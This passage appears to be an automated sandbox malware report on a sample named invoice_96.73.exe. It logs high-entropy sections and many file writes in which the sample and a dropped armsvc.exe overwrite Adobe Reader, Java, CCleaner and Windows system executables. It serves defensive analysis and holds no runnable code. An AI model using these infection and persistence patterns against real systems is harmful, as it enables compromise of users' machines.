      Source: Aut2exe.exe.2.dr Static PE information: section name: .rsrc entropy: 7.818525491808237
      Source: Aut2exe_x64.exe.2.dr Static PE information: section name: .rsrc entropy: 7.818635676263212
      Source: AutoIt3_x64.exe.2.dr Static PE information: section name: .reloc entropy: 7.9509701918108
      Source: RdrServicesUpdater.exe.2.dr Static PE information: section name: .reloc entropy: 7.939448077885585
      Source: AcroRd32.exe.2.dr Static PE information: section name: .reloc entropy: 7.920315636020403
      Source: DW20.EXE.2.dr Static PE information: section name: .reloc entropy: 7.94461005915879

      Persistence and Installation Behavior

      Source: C:\Users\user\Desktop\invoice_96.73.exe File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe File written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe File written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe File written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrServicesUpdater.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe File written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe File written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32Info.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe File written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe File written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Windows\System32\wbem\WmiApSrv.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\CCleaner\CCleaner64.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Java\jre1.8.0_121\bin\ssvagent.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Windows\ehome\ehsched.exe
      Source: C:\Users\user\Desktop\invoice_96.73.exe System file written: C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Java\jre1.8.0_121\bin\jabswitch.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Windows\System32\vds.exe
      Source: C:\Users\user\Desktop\invoice_96.73.exe System file written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe
      Source: C:\Users\user\Desktop\invoice_96.73.exe System file written: C:\Windows\System32\alg.exe
